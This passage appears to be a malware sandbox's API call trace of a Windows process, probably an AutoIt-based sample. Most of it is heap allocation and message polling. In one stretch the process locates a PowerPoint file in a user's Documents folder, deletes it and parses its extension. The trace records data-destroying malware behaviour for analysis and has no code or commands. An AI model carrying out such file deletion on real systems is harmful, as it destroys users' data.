lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.074] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.074] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.074] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.075] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.075] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.075] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.075] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.075] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.075] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.075] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.075] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.076] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.076] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFilePart=0x0) returned 0x36 [0033.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.076] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x1398a1a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0x7c2240 [0033.076] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H3Wz1PxDd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h3wz1pxdd.pptx")) returned 1 [0033.077] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x1398a1a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 0 [0033.078] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.078] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0033.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.080] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.081] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.081] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.083] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.083] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 